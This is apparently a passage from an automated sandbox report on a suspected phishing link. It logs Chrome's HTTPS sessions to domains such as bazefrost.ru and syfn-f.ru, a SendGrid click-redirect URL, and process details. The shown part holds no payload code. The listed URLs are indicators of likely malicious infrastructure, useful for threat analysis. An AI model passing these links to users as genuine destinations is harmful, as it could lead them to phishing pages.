                                        Data Ascii: ,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((l=t.params.theme)!==null&&l!==void 0?l:t.theme,"/").concat(a);t.wrapper.parentNode||m("Cannot initialize Widget, Element not found (#".c


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.449754104.16.2.1894432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:49 UTC603OUTGET /favicon.png HTTP/1.1
                                        Host: developers.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://nr3hz5fbqd.bazefrost.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:49 UTC697INHTTP/1.1 200 OK
                                        Date: Sat, 15 Feb 2025 19:34:49 GMT
                                        Content-Type: image/png
                                        Content-Length: 937
                                        Connection: close
                                        Cache-Control: public, max-age=0, must-revalidate
                                        ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                        Set-Cookie: __cf_bm=AY1u4vQbN8qOCuRXIyY3H7tdq9__9oFAv6j.uwADLcg-1739648089-1.0.1.1-BJKvblxkjEhpftos9EnVBgd70BMMCx9b9aqDGEat4QoClbKAMdk7fBJZhB2tFBkj8aBhHIGN7n5G9R7g_A9.kg; path=/; expires=Sat, 15-Feb-25 20:04:49 GMT; domain=.developers.cloudflare.com; HttpOnly; Secure; SameSite=None
                                        Strict-Transport-Security: max-age=15552000; preload
                                        X-Content-Type-Options: nosniff
                                        access-control-allow-origin: *
                                        Server: cloudflare
                                        CF-RAY: 9127bcd018f7c463-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-02-15 19:34:49 UTC672INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                        Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6
                                        2025-02-15 19:34:49 UTC265INData Raw: a0 09 1c 01 87 e4 9b b0 01 bd 5f 93 b5 e8 ca 40 13 68 01 2f 84 89 fb c2 c4 2e 16 2f 55 32 4e 64 f5 92 e4 8b e6 07 f8 2e f9 a6 f0 55 f2 05 7c 06 9f c0 7b d0 28 16 da cd ad 79 10 09 81 d7 60 0c 7c 04 e3 dc 02 7a 5c cd 06 7a d9 40 0b 6f 35 18 88 e1 2d 98 94 0b 4f f4 54 c6 54 4c 29 af 35 17 1d ce 79 b1 6d 0d 9d ab 96 0f 81 01 7a 5a e3 94 7f d8 81 b3 c7 bc c5 8b 12 f1 3a 1b b8 42 97 8a 69 0a e5 8e 77 ce 82 d2 eb 3f 21 0c f0 f6 6d 2d 78 69 f5 95 1f a6 e7 3b 9c 9e 0f 65 0c 30 c9 41 cc e1 1c 57 c7 7d bf ef 45 a6 b5 88 75 ff 0a ee e7 c8 cf 68 30 4f ad 2f c5 de df 82 55 df 00 6a 41 1d c4 ea 2c 20 a2 f3 7b 0f 28 fc ff 7f b1 f8 dd cf 5f 3d fe 77 23 bf 7e 8b c6 3c bd c1 67 0f 56 7a 91 a9 c6 c8 6f 40 1a 65 ce 9b fb 93 9b 1b b9 91 1b bf 01 83 32 f8 e3 ed 08 de 54 00 00
                                        Data Ascii: _@h/./U2Nd.U|{(y`|z\z@o5-OTTL)5ymzZ:Biw?!m-xi;e0AW}Euh0O/UjA, {(_=w#~<gVzo@e2T


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.449756104.16.2.1894432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:50 UTC527OUTGET /favicon.png HTTP/1.1
                                        Host: developers.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: __cf_bm=AY1u4vQbN8qOCuRXIyY3H7tdq9__9oFAv6j.uwADLcg-1739648089-1.0.1.1-BJKvblxkjEhpftos9EnVBgd70BMMCx9b9aqDGEat4QoClbKAMdk7fBJZhB2tFBkj8aBhHIGN7n5G9R7g_A9.kg
                                        2025-02-15 19:34:50 UTC413INHTTP/1.1 200 OK
                                        Date: Sat, 15 Feb 2025 19:34:50 GMT
                                        Content-Type: image/png
                                        Content-Length: 937
                                        Connection: close
                                        Cache-Control: public, max-age=0, must-revalidate
                                        ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                        Strict-Transport-Security: max-age=15552000; preload
                                        X-Content-Type-Options: nosniff
                                        access-control-allow-origin: *
                                        Server: cloudflare
                                        CF-RAY: 9127bcd70f24c343-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-02-15 19:34:50 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                        Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.449764188.114.97.34432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:35:01 UTC572OUTGET /gando!durwqn HTTP/1.1
                                        Host: gnfsjz.syfn-f.ru
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://nr3hz5fbqd.bazefrost.ru
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://nr3hz5fbqd.bazefrost.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:35:02 UTC816INHTTP/1.1 200 OK
                                        Date: Sat, 15 Feb 2025 19:35:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AhwSdTWC3mjekdK3f%2BPIGmj38u3zLdg0uY96MFfRT7DyKSmR1wUZWlHpgPnH2XxZYf6OsDgWk2ahrCeNm8sxTjQx5R3ODjb5xYHHWoGM8ABLIZS%2FrbIx7K08CGBUWOUiyr10"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 9127bd1b09c942b0-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1713&rtt_var=655&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=1150&delivery_rate=1655328&cwnd=233&unsent_bytes=0&cid=403aeedaa9377799&ts=760&x=0"
                                        2025-02-15 19:35:02 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                        Data Ascii: 11
                                        2025-02-15 19:35:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.449767188.114.96.34432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:35:03 UTC352OUTGET /gando!durwqn HTTP/1.1
                                        Host: gnfsjz.syfn-f.ru
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:35:04 UTC820INHTTP/1.1 200 OK
                                        Date: Sat, 15 Feb 2025 19:35:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dRMNgNyYSZj23FR5If%2FtnuXlE6tX2hDt4jZNvjS%2B3BfaB4GYr%2B70nMH9lU25%2BsTT60EnAOMyuDnMBRmQJBLTJOFcTdPB0%2BkTbDpedq96ufy6V3ORNABdQrfBJgDyzy6eVaH8"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 9127bd27ff247c87-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4178&recv_bytes=930&delivery_rate=319719&cwnd=222&unsent_bytes=0&cid=506b59dfcc1f8ebb&ts=972&x=0"
                                        2025-02-15 19:35:04 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                        Data Ascii: 11
                                        2025-02-15 19:35:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Click to jump to process

                                        Click to jump to process

                                        Click to jump to process

                                        Target ID:0
                                        Start time:14:34:33
                                        Start date:15/02/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:2
                                        Start time:14:34:34
                                        Start date:15/02/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2024,i,8777589822983912623,9052887040892079843,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:3
                                        Start time:14:34:42
                                        Start date:15/02/2025
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3D"
                                        Imagebase:0x7ff76e190000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        No disassembly